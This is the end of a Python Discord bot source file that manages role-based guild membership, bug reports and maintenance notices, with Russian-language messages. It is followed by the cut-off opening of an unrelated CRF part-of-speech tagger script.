give_me_message(ctx, msg, sho: str, time_wait: int):\n\t\t\tdef check(msg):\n\t\t\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\t\t\tembed_give_me = discord.Embed(title='Система сбора данных \"Український хакер Вiталя\"', description=f\"Напишите в чат {sho}\", color=standard_color)\n\t\t\tembed_give_me = models.embed_stan(embed_give_me)\n\n\t\t\tembed_you_do_not_s = discord.Embed(title='Система сбора данных', description=f\"Вы не написали в чат '{sho}'. \\nПереношу вас на прежнюю страницу.\", color=standard_color)\n\t\t\tembed_you_do_not_s = models.embed_stan(embed_you_do_not_s)\n\n\t\t\tawait msg.edit(embed=embed_give_me, view=models.NonBts())\n\n\t\t\ttry:\n\t\t\t\tvalue = await bot.wait_for(\"message\", check=check, timeout=time_wait)\n\t\t\texcept TimeoutError:\n\t\t\t\tawait msg.edit(embed=embed_you_do_not_s)\n\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\tawait msgs(ctx, msg)\n\t\t\telse:\n\t\t\t\tawait value.delete()\n\t\t\t\treturn value.content\n\n\t\ttry:\n\t\t\ttitle = await give_me_message(ctx, msg, \"title.\", 20)\n\t\t\tdesc = await give_me_message(ctx, msg, \"полное сообщение.\", 300)\n\t\t\tpin = await give_me_message(ctx, msg, \"надо закреплять сообщение?\", 20)\n\t\t\tping = await give_me_message(ctx, msg, \"надо пинговать гильдию\", 20)\n\t\texcept Exception:\n\t\t\tawait msgs(ctx, msg)\n\t\telse:\n\n\t\t\tasync def all_guilds():\n\t\t\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\t\t\tobj = []\n\n\t\t\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\t\t\tfor gui in gs:\n\t\t\t\t\tc = models.get_tag_value(\"CHANNEL\", f\"channel_{gui}\")\n\t\t\t\t\tc = await guild.fetch_channel(c)\n\t\t\t\t\tr = models.get_tag_value(\"ROLE\", f\"role_{gui}\")\n\t\t\t\t\tr = guild.get_role(r)\n\n\t\t\t\t\tobj.append({\"role\": r, \"channel\": c})\n\n\t\t\t\treturn obj\n\n\t\t\tall_guilds = await all_guilds()\n\n\t\t\tall_mes = []\n\n\t\t\tfor obj in all_guilds:\n\t\t\t\tmes = await message(title=title, desc=desc, ctx=ctx, pin=pin, ping=ping, guild_obj=obj)\n\t\t\t\tall_mes.append(mes)\n\n\t\t\tawait msgs(ctx, msg)\n\texcept KeyError as ke:\n\t\tawait something_went_wrong(msg, f\"Ошибка базы данных!\\n {ke}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {ke}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\texcept Exception as e:\n\t\tawait something_went_wrong(msg, f\"Неизвестная проблема, {e}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {e}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\texcept BotMissingPermissions as bmp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{bmp}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {bmp}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\texcept MissingPermissions as mp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{mp}\")\n\t\tLOGGER.critical(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в гильдии: {mp}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\tfinally:\n\t\tLOGGER.success(\"All guild message!\")\n\n\n# ---------------------------------------------------------------------------\n\n# Не готовые функции\n\nasync def stat(ctx, msg):\n\tawait nope(ctx, msg, page_name=\"Статистика гильдий\", what_will_be_on_this_page=\"статистика сразу всех гильдий для ГМ-ов и смотрителей за гильдиями.\")\n\n\nasync def mana(ctx, msg):\n\tawait nope(ctx, msg, page_name=\"Управление гильдиями\", what_will_be_on_this_page=\"возможность управлять гильдиями для ГМ-ов и смотрителей.\")\n\n\n# ---------------------------------------------------------------------------\n\n# Вспомогательные функции\n\nasync def something_went_wrong(msg=None, problem: str = \"Внутреняя ошибка скрипта\", ctx: com.Context = None):\n\tembed = discord.Embed(title=\"О нет, что-то пошло не так!\", description=f\"В ходе выполнение определенных действий произошла ошибка, наши специалисты скорее всего уже решают её(они спят). \\n\"\n\t f\"Сведения об ошибке: {problem}\", color=standard_color)\n\n\tembed = models.embed_stan(embed)\n\tif msg is not None:\n\t\tawait msg.edit(embed=embed)\n\t\tawait asyncio.sleep(10)\n\t\tawait msg.delete()\n\telse:\n\t\tawait ctx.send(embed=embed, view=models.NonBts(), delete_after=60)\n\n\nasync def guild_ret(guild: str, ctx):\n\tif guild.lower() == \"dendro\" or guild.lower() == \"дендро\":\n\t\tguild_name = \"Dendro\"\n\n\telif guild.lower() == \"hydro\" or guild.lower() == \"гидро\":\n\t\tguild_name = \"Hydro\"\n\n\telif guild.lower() == \"pyro\" or guild.lower() == \"пиро\":\n\t\tguild_name = \"Pyro\"\n\n\telif guild.lower() == \"cryo\" or guild.lower() == \"крио\":\n\t\tguild_name = \"Cryo\"\n\n\telif guild.lower() == \"anemo\" or guild.lower() == \"анемо\":\n\t\tguild_name = \"Anemo\"\n\n\telif guild.lower() == \"electro\" or guild.lower() == \"электро\":\n\t\tguild_name = \"Electro\"\n\n\telif guild.lower() == \"geo\" or guild.lower() == \"гео\":\n\t\tguild_name = \"Geo\"\n\telse:\n\t\treturn [None, None]\n\n\tguild = await bot.fetch_guild(ctx.guild.id)\n\n\trole = guild.get_role(models.get_tag_value(\"ROLE\", f\"role_{guild_name}\"))\n\n\tchannel = await bot.fetch_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild_name}\"))\n\n\treturn {\"role\": role, \"channel\": channel}\n\n\n# ---------------------------------------------------------------------------\n\n# Функции профилей\n\nasync def return_profile(ctx=None, msg=None):\n\tacc = await access_lvl(ctx)\n\tif acc == 0:\n\t\treturn await user_profile(ctx, msg)\n\telif acc == 1:\n\t\treturn await Gmaster_profile(ctx, msg)\n\telse:\n\t\tif acc == 2:\n\t\t\treturn await Gvision_profile(ctx, msg)\n\t\telse:\n\t\t\tLOGGER.warning(\"Undefined lvl\")\n\n\nasync def get_stats_profile(user_id, msg, ctx):\n\tawait nope(ctx, msg, \"stats profile\", \"\")\n\n\nasync def nope(ctx, msg, page_name, what_will_be_on_this_page):\n\tembed_with_nope_page = discord.Embed(title=f'{page_name}',\n\t description=f\"Этой страницы ещё не существует. Когда-нибудь тут будет {what_will_be_on_this_page}\\n\\n\"\n\t f\"{ctx.author.nick}, эта страница будет закрыта через несколько секунд...\",\n\t color=standard_color)\n\n\tembed_with_nope_page = models.embed_stan(embed_with_nope_page)\n\n\tawait msg.edit(embed=embed_with_nope_page, view=models.NonBts())\n\tawait asyncio.sleep(10)\n\tawait msg.delete()\n\n\n# ---------------------------------------------------------------------------\n\n@bot.command(name=\"prof\", aliases=[\"проф\", \"п\", \"p\", \"з\"])\n@com.max_concurrency(number=1, per=com.BucketType.user, wait=False)\nasync def user_profile_Gmember_or_Gmaster_or_Gvision(ctx):\n\ttry:\n\t\tloading = discord.Embed(title=\"Загрузка\", description=\"Определяю уровень доступа...\\n\\n Загружаю данные...\", color=standard_color)\n\t\tloading = models.embed_stan(loading)\n\t\t#\n\t\t#\n\t\t#\n\t\tmsg = await ctx.send(embed=loading)\n\t\tawait return_profile(ctx, msg)\n\texcept Exception as exc:\n\t\tLOGGER.error(f\"Profile exception {exc}\")\n\t\tawait something_went_wrong(problem=str(exc), ctx=ctx)\n\n\n@bot.command(\n\tname=\"bug\",\n\taliases=[\"баг\", \"ошибка\"],\n\tbrief=\"Сообщение о баге на сервер поддержки бота\",\n\tusage=\"+bug [сообщение]\"\n)\nasync def bug_report(ctx, *, message=None):\n\ttry:\n\t\tserver = bot.get_guild(856964290777972787)\n\t\tbugs_channel = server.get_channel(875032089756577882)\n\t\tsession = secrets.token_hex(2)\n\texcept Exception as exc:\n\t\tLOGGER.error(f\"Bug report command error \\n{exc}\")\n\telse:\n\t\ttry:\n\t\t\tat_count = 0\n\t\t\tatts = [models.embed_stan(discord.Embed(title=f\"New bug...(session={session})\", description=f\"**Новый баг от {ctx.author.mention} Сообщение**: \\n\\n\\n \"\n\t\t\t f\"{message if message is not None else 'Не указано описание, скорее всего есть только фото.'}\",\n\t\t\t color=discord.Color.red(\n\n\t\t\t )))]\n\n\t\t\tfor attach in ctx.message.attachments:\n\t\t\t\tat_count += 1\n\t\t\t\tif at_count == 9:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tatts.append(discord.Embed(title=f\"session={session}\", color=discord.Color.red()).set_image(url=attach.url))\n\n\t\t\tasync def send():\n\t\t\t\tc = 0\n\t\t\t\tif at_count >= 1:\n\t\t\t\t\tc += 1\n\t\t\t\telif message is not None:\n\t\t\t\t\tc += 1\n\n\t\t\t\tif c >= 1:\n\t\t\t\t\tawait bugs_channel.send(embeds=atts)\n\t\t\t\t\tawait ctx.reply(embed=models.embed_stan(embed=discord.Embed(title=\"Отправлено\", color=discord.Color.green())), delete_after=5)\n\n\t\t\t\t\tawait asyncio.sleep(5)\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\n\t\t\tx = await send()\n\t\t\tif x is False:\n\t\t\t\tawait something_went_wrong(ctx=ctx, problem=\"Вы не указали ничего, что можно было-бы переслать хозяину.\")\n\t\t\telse:\n\t\t\t\tpass\n\t\t\tawait ctx.message.delete()\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(f\"Bug report command error \\n{exc}\")\n\t\t\tawait something_went_wrong(ctx=ctx, problem=str(exc))\n\t\t\traise ConnectionError(str(exc)) from exc\n\n\n@bug_report.error\nasync def error_handler(ctx, error):\n\tawait something_went_wrong(ctx=ctx, problem=str(error))\n\n\n# @bot.command(\n# name=\"тех\",\n# aliases=[\"tech\"],\n# usage='+tech date_wait=\"now\", time_wait=\"now\", *, reason=None'\n# )\n# @com.cooldown(1, 20, type=com.BucketType.user)\n# @com.is_owner()\n# async def tech_stop(ctx, date_wait=\"now\", time_wait=\"now\", *, reason=None):\n# async def get_date(date=None, cooldown_seconds=None):\n# timezone = dt.timezone(offset=dt.timedelta(hours=2), name=\"UTC\")\n# dt_now = dt.datetime.now(tz=timezone)\n#\n# if type(date) is not str or type(cooldown_seconds) is not str:\n# raise NotImplementedError\n#\n# try:\n# if date is None and cooldown_seconds == 'now':\n# return dt_now\n# else:\n# if cooldown_seconds is None and date == 'now':\n# return dt_now\n# else:\n# if date is None and cooldown_seconds is None:\n# return dt_now\n# else:\n# if date == 'now' and cooldown_seconds == 'now':\n# return dt_now\n# else:\n# if date == 'now' and cooldown_seconds != 'now':\n# year = dt_now.year\n# month = dt_now.month\n# day = dt_now.day\n#\n# hour = cooldown_seconds.split('.', -1)[0]\n# minute = cooldown_seconds.split('.', -1)[1]\n# second = cooldown_seconds.split('.', -1)[2]\n#\n# time_ret = datetime(year=int(year), month=int(month), day=int(day),\n# hour=int(hour), minute=int(minute), second=int(second), tzinfo=timezone)\n#\n# return time_ret\n#\n# elif cooldown_seconds == 'now' and date != 'now':\n# year = date.split('/', -1)[2]\n# month = date.split('/', -1)[1]\n# day = date.split('/', -1)[0]\n#\n# hour = dt_now.hour\n# minute = dt_now.minute\n# second = dt_now.second\n#\n#\n#\n# time_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n# hour=int(hour), minute=int(minute), second=int(second), tzinfo=timezone)\n#\n# return time_ret\n#\n# elif cooldown_seconds and date != \"now\":\n# year = date.split('/', -1)[2]\n# month = date.split('/', -1)[1]\n# day = date.split('/', -1)[0]\n#\n# hour = cooldown_seconds.split('.', -1)[0]\n# minute = cooldown_seconds.split('.', -1)[1]\n# second = cooldown_seconds.split('.', -1)[2]\n#\n# time_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n# hour=int(hour), minute=int(minute), second=int(second), tzinfo=timezone)\n# return time_ret\n#\n# except Exception as exc:\n# print(exc)\n# await ctx.send\n#\n# if date_wait and time_wait == \"now\":\n# return await ctx.send(ctx.command.usage)\n#\n# if reason is None:\n# reason = \"Технический перерыв\"\n# else:\n# reason = reason\n#\n# join_guild_channel = ctx.guild.get_channel(settings[\"ag_ci\"])\n#\n# if isinstance(join_guild_channel, discord.TextChannel):\n# pass\n# else:\n# await ctx.send(\"Не определился канал\", delete_after=5)\n# h = await join_guild_channel.history(limit=500).flatten()\n# for msg in h:\n# await msg.delete()\n#\n# async def get_time_stamp(date, cooldown_seconds) -> list[str | datetime] | str:\n# try:\n# cooldown_seconds: datetime = await get_date(date, cooldown_seconds)\n# times = cooldown_seconds.timestamp()\n# times = str(times).split(\".\")[0]\n# timestamp: str = f\"\"\n# return [timestamp, cooldown_seconds]\n# except Exception as exc:\n# print(f\"Timestamp exception {exc}\")\n# return [f\"\", datetime.now()]\n#\n# base_roles_1 = join_guild_channel.guild.get_role(794994804018642965)\n# base_roles_2 = join_guild_channel.guild.get_role(933746139264610314)\n#\n# await join_guild_channel.set_permissions(target=base_roles_1, overwrite=nextcord.PermissionOverwrite(view_channel=False))\n# await join_guild_channel.set_permissions(target=base_roles_2, overwrite=nextcord.PermissionOverwrite(view_channel=False))\n#\n# overwrites = {\n# join_guild_channel.guild.default_role: discord.PermissionOverwrite(view_channel=False, send_messages=False),\n# base_roles_1: discord.PermissionOverwrite(view_channel=True, send_messages=False),\n# base_roles_2: discord.PermissionOverwrite(view_channel=True, send_messages=False),\n# bot.user: discord.PermissionOverwrite(view_channel=True, send_messages=True),\n# ctx.author: discord.PermissionOverwrite(view_channel=True, send_messages=True)\n# }\n#\n# channel = await join_guild_channel.guild.create_text_channel(\n# position=0,\n# category=join_guild_channel.category,\n# name=f\"Технический перерыв\",\n# overwrites=overwrites,\n# reason=\"По приказу генерала гафса\",\n# topic=f\"Тех перерыв\",\n# slowmode_delay=1\n#\n# )\n# tms = await get_time_stamp(date_wait, time_wait)\n# tech_s_embed = discord.Embed(title=\"Технический перерыв\", description=f\"Временно приостановленна деятельность канала {join_guild_channel.mention} по причине:\\n**{reason}**\\n\\n\\n\\nКанал \"\n# f\"откроется {tms[0]}.\", color=discord.Color.red())\n# tech_s_embed = models.embed_stan(embed=tech_s_embed)\n# await channel.send(embed=tech_s_embed)\n# x: datetime = tms[1]\n#\n# x = dt.timedelta(h)\n#\n# await asyncio.wait()\n\n@bot.command(\n\tname=\"тех\",\n\taliases=[\"tech\"],\n\tusage='+tech date_wait=\"now\", time_wait=\"now\", *, reason=None'\n)\n@com.cooldown(1, 20, type=com.BucketType.user)\n@com.is_owner()\nasync def tech_stop(ctx, date_wait=\"now\", time_wait=\"now\", *, reason=None):\n\tasync def get_date(date=None, time=None):\n\t\tisrael_tz = dt.timezone(offset=dt.timedelta(hours=2), name=\"UTC\")\n\t\tdt_now = dt.datetime.now(tz=israel_tz)\n\n\t\tif type(date) is not str or type(time) is not str:\n\t\t\traise NotImplementedError\n\n\t\ttry:\n\t\t\tif date is None and time == 'now':\n\t\t\t\treturn dt_now\n\t\t\telse:\n\t\t\t\tif time is None and date == 'now':\n\t\t\t\t\treturn dt_now\n\t\t\t\telse:\n\t\t\t\t\tif date is None and time is None:\n\t\t\t\t\t\treturn dt_now\n\t\t\t\t\telse:\n\t\t\t\t\t\tif date == 'now' and time == 'now':\n\t\t\t\t\t\t\treturn dt_now\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif date == 'now' and time != 'now':\n\t\t\t\t\t\t\t\tyear = dt_now.year\n\t\t\t\t\t\t\t\tmonth = dt_now.month\n\t\t\t\t\t\t\t\tday = dt_now.day\n\n\t\t\t\t\t\t\t\thour = time.split('.', -1)[0]\n\t\t\t\t\t\t\t\tminute = time.split('.', -1)[1]\n\t\t\t\t\t\t\t\tsecond = time.split('.', -1)[2]\n\n\t\t\t\t\t\t\t\ttime_ret = datetime(year=int(year), month=int(month), day=int(day),\n\t\t\t\t\t\t\t\t hour=int(hour), minute=int(minute), second=int(second), tzinfo=israel_tz)\n\n\t\t\t\t\t\t\t\treturn time_ret\n\n\t\t\t\t\t\t\telif time == 'now' and date != 'now':\n\t\t\t\t\t\t\t\tyear = date.split('/', -1)[2]\n\t\t\t\t\t\t\t\tmonth = date.split('/', -1)[1]\n\t\t\t\t\t\t\t\tday = date.split('/', -1)[0]\n\n\t\t\t\t\t\t\t\thour = dt_now.hour\n\t\t\t\t\t\t\t\tminute = dt_now.minute\n\t\t\t\t\t\t\t\tsecond = dt_now.second\n\n\t\t\t\t\t\t\t\ttime_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n\t\t\t\t\t\t\t\t hour=int(hour), minute=int(minute), second=int(second), tzinfo=israel_tz)\n\n\t\t\t\t\t\t\t\treturn time_ret\n\n\t\t\t\t\t\t\telif time and date != \"now\":\n\t\t\t\t\t\t\t\tyear = date.split('/', -1)[2]\n\t\t\t\t\t\t\t\tmonth = date.split('/', -1)[1]\n\t\t\t\t\t\t\t\tday = date.split('/', -1)[0]\n\n\t\t\t\t\t\t\t\thour = time.split('.', -1)[0]\n\t\t\t\t\t\t\t\tminute = time.split('.', -1)[1]\n\t\t\t\t\t\t\t\tsecond = time.split('.', -1)[2]\n\n\t\t\t\t\t\t\t\ttime_ret: datetime = datetime(year=int(year), month=int(month), day=int(day),\n\t\t\t\t\t\t\t\t hour=int(hour), minute=int(minute), second=int(second), tzinfo=israel_tz)\n\t\t\t\t\t\t\t\treturn time_ret\n\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(\n\t\t\t\tf\"TECH command error \\n {exc}\"\n\t\t\t)\n\t\t\tawait ctx.send(exc)\n\n\tif date_wait and time_wait == \"now\":\n\t\treturn await ctx.send(ctx.command.usage)\n\n\tif reason is None:\n\t\treason = \"Технический перерыв\"\n\telse:\n\t\treason = reason\n\n\tjoin_guild_channel = ctx.guild.get_channel(settings[\"ag_ci\"])\n\n\tif isinstance(join_guild_channel, discord.TextChannel):\n\t\tpass\n\telse:\n\t\tawait ctx.send(\"Не определился канал\", delete_after=5)\n\th = await join_guild_channel.history(limit=500).flatten()\n\tfor msg in h:\n\t\tawait msg.delete()\n\n\tasync def get_time_stamp(date, time) -> str:\n\t\ttry:\n\t\t\ttime: datetime = await get_date(date, time)\n\t\t\ttimes = time.timestamp()\n\t\t\ttimes = str(times).split(\".\")[0]\n\t\t\ttimestamp: str = f\"\"\n\t\t\treturn timestamp\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(f\"get timestamp exception {exc}\")\n\t\t\treturn f\"\"\n\n\ttech_s_embed = discord.Embed(title=\"Технический перерыв\", description=f\"Временно приостановленна деятельность канала {join_guild_channel.mention} по причине:\\n**{reason}**\\n\\n\\n\\nКанал \"\n\t f\"откроется {await get_time_stamp(date_wait, time_wait)}.\", color=discord.Color.red())\n\ttech_s_embed = models.embed_stan(embed=tech_s_embed)\n\tawait join_guild_channel.send(embed=tech_s_embed)\n\n\n@tech_stop.error\nasync def err(ctx, exception):\n\tif isinstance(exception, com.NotOwner):\n\t\tawait ctx.send(\"Недостаточно прав\", delete_after=15)\n\telif isinstance(exception, com.CommandOnCooldown):\n\t\tawait ctx.send(f\"Подожди {exception.retry_after:.2f}\", delete_after=15)\n\n\nasync def is_in_guild(ctx, guilds, member) -> tuple[str, bool]:\n\tfor g in guilds:\n\t\trole_id = models.NEDOGUILD().get_one_tag(guild=g, tag=\"role\")\n\t\trole = ctx.guild.get_role(role_id)\n\n\t\tif role in member.roles:\n\t\t\treturn g, True\n\n\treturn \"None\", False\n\n\nclass UnknownGuild(GmasterNotDefined):\n\tmsg = \"Гильдия не определена\"\n\n\n@bot.command(\n\tname=\"гильдия\",\n\taliases=[\n\t\t\"guild\",\n\t\t\"g\",\n\t\t\"г\"\n\t]\n)\n# @com.cooldown(1, 20, type=com.BucketType.user)\nasync def get_into(ctx, member: nextcord.Member):\n\tinvite_state = False\n\tguild_master = GuildMaster(\n\t\tctx=ctx\n\t)\n\n\tguild_name, user_in_guild = await is_in_guild(ctx, GUILDS, member=member)\n\n\tLOGGER.info(f\"{guild_name} === {user_in_guild}\")\n\n\tif guild_master.guild.lower() == 'unknown':\n\t\traise GmasterNotDefined\n\n\tdefense = GuildDefense(bot, ctx.guild, member.id, guild_master.guild)\n\n\twith open(\"additional_files/invites.json\", \"r\", encoding=\"UTF-8\") as invites_file:\n\t\tinvites_dict = json.load(invites_file)\n\n\ttry:\n\t\tif member.id in invites_dict[\"ids_list\"]:\n\t\t\tinvite_state = True\n\t\telif invites_dict[f\"invite_{member.id}\"][\"in_creating_invite\"]:\n\t\t\tinvite_state = True\n\n\texcept Exception as exc:\n\t\tinvite_state = False\n\t\tLOGGER.error(f\"Error in get_into -> invite creating check: {exc}\")\n\n\tdef do(defence: GuildDefense, invite_state: bool, guild_master: GuildMaster, user_in_guild: bool, guild_name: str) -> str or None:\n\t\tif defence.is_on_cooldown[0]:\n\t\t\tif user_in_guild:\n\t\t\t\treturn \"kick\"\n\n\t\t\treturn \"on_cooldown\"\n\n\t\telif invite_state:\n\t\t\treturn \"has_invite\"\n\n\t\telif user_in_guild:\n\t\t\tif guild_master.guild.strip().lower() == guild_name.strip().lower():\n\t\t\t\treturn \"kick\"\n\n\t\t\treturn \"other_guild\"\n\n\t\treturn \"add\"\n\n\tcase: str = do(defence=defense, invite_state=invite_state, guild_master=guild_master, user_in_guild=user_in_guild, guild_name=guild_name)\n\n\tLOGGER.success(case)\n\tif case == \"on_cooldown\":\n\t\tprops = defense.is_on_cooldown[1]\n\t\ttime_until_2m = datetime.fromtimestamp(float(props.get(\"until\", None))) + dt.timedelta(seconds=120)\n\n\t\ttimestamp_until = str(time_until_2m.timestamp()).split(\".\")[0]\n\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"{member.mention} недавно покинул {props.get('guild', '(ошибка)')}, он снова сможет вступить в гильдию !\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"has_invite\":\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"На имя {member.mention} уже отправлена заявка в одну из гильдий, невозможно его принять!\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\tLOGGER.warning(f\"Warning in get_into -> invite has check\")\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"kick\":\n\t\trole_id = models.NEDOGUILD().get_one_tag(guild=guild_name, tag=\"role\")\n\t\trole = ctx.guild.get_role(role_id)\n\n\t\tawait member.remove_roles(\n\t\t\trole, reason=\"По приказу генерала гафса!\"\n\t\t)\n\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Ура!\",\n\t\t\t\tdescription=f\"{member.mention} был исключен из гильдии {guild_name}!\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\tLOGGER.debug(f\"Kicked user from {guild_name}\")\n\n\t\tdefense.set_cooldown(cooldown_seconds=ONE_DAY_IN_SECONDS * 7) # 2 days\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"other_guild\":\n\t\tembed_error = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"Мастер гильдии {guild_master.guild} не может исключить пользователя из гильдии {guild_name}!\\n\\n\\n\\n***User collegium magistri variant!***\",\n\t\t\t\tcolor=nextcord.Color.red(),\n\t\t\t)\n\t\t)\n\t\tLOGGER.debug(f\"User collegium magistri variant\")\n\t\treturn await ctx.send(embed=embed_error)\n\telif case == \"add\":\n\t\trole_id = models.NEDOGUILD().get_one_tag(guild=guild_master.guild, tag=\"role\")\n\t\trole = ctx.guild.get_role(role_id)\n\n\t\tawait member.add_roles(\n\t\t\trole, reason=\"По приказу генерала гафса!\"\n\t\t)\n\n\t\tembed = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Ура!\",\n\t\t\t\tdescription=f\"{member.mention} был принят в гильдию {guild_master.guild}!\"\n\t\t\t)\n\t\t)\n\t\tLOGGER.success(f\"Successfully initiated {member.mention} into {guild_master.guild}\")\n\t\tawait ctx.send(embed=embed)\n\telse:\n\t\tembed = models.embed_stan(\n\t\t\tnextcord.Embed(\n\t\t\t\ttitle=\"Не вышло!\",\n\t\t\t\tdescription=f\"Неизвестный сценарий выполнения команды\"\n\t\t\t)\n\t\t)\n\t\tLOGGER.success(f\"Неизвестный сценарий match case into guild\")\n\t\tawait ctx.send(embed=embed)\n\n\n# if defense.is_on_cooldown[0]:\n# \tprops = defense.is_on_cooldown[1]\n# \ttime_until_2m = datetime.fromtimestamp(float(props.get(\"until\", None))) + dt.timedelta(seconds=120)\n#\n# \ttimestamp_until = str(time_until_2m.timestamp()).split(\".\")[0]\n#\n# \tembed_error = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Не вышло!\",\n# \t\t\tdescription=f\"{member.mention} вышел из {props.get('guild', '(ошибка)')}, он снова сможет вступить в гильдию .\",\n# \t\t\tcolor=nextcord.Color.red(),\n# \t\t)\n# \t)\n# \treturn await ctx.send(embed=embed_error)\n# # \tТипа если заявку делает.\n# elif invite_state:\n# \tembed_error = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Не вышло!\",\n# \t\t\tdescription=f\"У {member.mention} уже есть заявка!\",\n# \t\t\tcolor=nextcord.Color.red(),\n# \t\t)\n# \t)\n# \tLOGGER.warning(f\"Warning in get_into -> invite has check\")\n# \treturn await ctx.send(embed=embed_error)\n# elif user_in_guild:\n#\n# \trole_id = models.NEDOGUILD().get_one_tag(guild=guild_name, tag=\"role\")\n# \trole = ctx.guild.get_role(role_id)\n#\n# \tawait member.remove_roles(\n# \t\trole, reason=\"По приказу генерала гафса!\"\n# \t)\n#\n# \tembed_error = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Ура!\",\n# \t\t\tdescription=f\"У {member.mention} успешно покинул гильдию {guild_name}!\",\n# \t\t\tcolor=nextcord.Color.red(),\n# \t\t)\n# \t)\n# \tLOGGER.debug(f\"Warning in get_into -> user already has guild\")\n#\n# \tdefense.set_cooldown(cooldown_seconds=(60 * 60 * 24 * 2)) # 2 days\n# \treturn await ctx.send(embed=embed_error)\n#\n# else:\n# \tLOGGER.debug(invite_state)\n# \trole_id = models.NEDOGUILD().get_one_tag(guild=guild_master.guild, tag=\"role\")\n# \trole = ctx.guild.get_role(role_id)\n#\n# \tawait member.add_roles(\n# \t\trole, reason=\"По приказу генерала гафса!\"\n# \t)\n#\n# \tembed = models.embed_stan(\n# \t\tnextcord.Embed(\n# \t\t\ttitle=\"Ура!\",\n# \t\t\tdescription=f\"{member.mention} был принят в гильдию {guild_master.guild}!\"\n# \t\t)\n# \t)\n# \tLOGGER.success(f\"Successfully initiated {member.mention} into {guild_master.guild}\")\n# \tawait ctx.send(embed=embed)\n\n\n@get_into.error\nasync def get_into_error_handler(ctx, exception):\n\ttry:\n\t\traise exception\n\texcept GmasterNotDefined as exc:\n\t\tawait something_went_wrong(problem=f\"Гильд мастер не определен! \\n {exc}\", ctx=ctx)\n\n\t\tLOGGER.error(\n\t\t\tf\"Ошибка в досрочном принятии пользователя в гильдию! \\n {exc}\"\n\t\t)\n\texcept Exception as exc:\n\t\tawait something_went_wrong(problem=f\"Неизвестная ошибка! \\n {exc}\", ctx=ctx)\n\n\t\tLOGGER.error(\n\t\t\tf\"Ошибка в досрочном принятии пользователя в гильдию! \\n {exc}\"\n\t\t)\n\n\nif __name__ == '__main__':\n\tbot.run(token=settings['token'])\n","repo_name":"yatochka-dev/GuildsBot","sub_path":"slavebot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":78301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71037241795","text":"# -*- coding: utf-8 -*-\n\nimport pickle\nimport random\nfrom collections import defaultdict\nfrom datetime import datetime, timedelta\n\nimport numpy as np\nfrom scipy.misc import logsumexp\n\n\nclass CRF(object):\n\n def __init__(self, nt):\n # 词性数量\n self.nt = nt\n\n def create_feature_space(self, data):\n # 特征空间\n self.epsilon = list({\n f for wiseq, tiseq in data\n for f in set(self.instantiate(wiseq, 0, -1)).union(\n *[self.instantiate(wiseq, i, tiseq[i - 1])\n for i, ti in enumerate(tiseq[1:], 1)]\n )\n })\n # 特征对应索引的字典\n self.fdict = {f: i for i, f in enumerate(self.epsilon)}\n # 特征空间维度\n self.d = len(self.epsilon)\n\n # 特征权重\n self.W = np.zeros((self.d, self.nt))\n # Bigram特征及对应权重分值\n self.BF = [self.bigram(prev_ti) for prev_ti in range(self.nt)]\n self.BS = np.array([self.score(bfv) for bfv in self.BF])\n\n def SGD(self, trainset, devset, file,\n epochs, batch_size, interval, eta, decay, lmbda,\n anneal, regularize):\n # 训练集大小\n n = len(trainset)\n # 记录更新次数\n count = 0\n # 记录迭代时间\n total_time = timedelta()\n # 记录最大准确率及对应的迭代次数\n max_e, max_accuracy = 0, 0.0\n\n # 迭代指定次数训练模型\n for epoch in range(1, epochs + 1):\n start = 